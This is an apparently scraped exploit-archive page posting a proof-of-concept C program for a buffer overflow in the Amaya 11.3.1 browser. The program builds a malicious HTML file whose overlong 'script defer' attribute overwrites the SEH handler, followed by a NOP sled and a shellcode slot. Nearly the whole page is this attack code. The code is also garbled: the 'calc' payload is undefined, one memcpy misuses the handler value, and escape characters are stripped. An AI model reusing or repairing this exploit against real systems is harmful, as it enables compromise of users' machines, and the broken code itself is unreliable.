Home / os / win7

Amaya 11.3.1(dec 9 2009) remote buffer overflow (poc)

Posted on 21 May 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Amaya 11.3.1(dec 9 2009) remote buffer overflow (poc)</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=====================================================
Amaya 11.3.1(dec 9 2009) remote buffer overflow (poc)
=====================================================


#include&lt;stdio.h&gt;
/*Amaya 11.3.1(dec 9 2009) remote buffer overflow(poc)*/
     unsigned int seh=0x7C902783;   ;
     char nseh[]=&quot;xebx04x90x90&quot;;
  void gen_random(char *s, const int  len)
    { int i;
      static const char alphanum[] =&quot;0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz&quot;;
       
      for(i=0;i&lt;len;i++)
      {
        s[i]=alphanum[rand()%(sizeof(alphanum)-1)];
      }
       s[len]=0;
      }
       char html[]=&quot;&lt;script defer=&quot;&quot;;
       char end[]=&quot;&quot;&gt;&quot;;
     int main(){
         FILE*f=fopen(&quot;shit.html&quot;,&quot;wb&quot;);
         char buffer[100000];
        fwrite(html,1,sizeof(html)-1,f);
        gen_random(buffer,12996);
        memcpy(buffer+11266,&amp;seh,4);
        memcpy(buffer+11262,seh,4);
        memset(buffer+11266,0x90,10);
        memcpy(buffer+11276,calc,strlen(calc));
        fwrite(buffer,1,12996,f);
         
        fwrite(end,1,sizeof(end)-1,f);
        fclose(f);
        printf(&quot;done&quot;);
        getchar();
        return 0;
     }


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-21]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :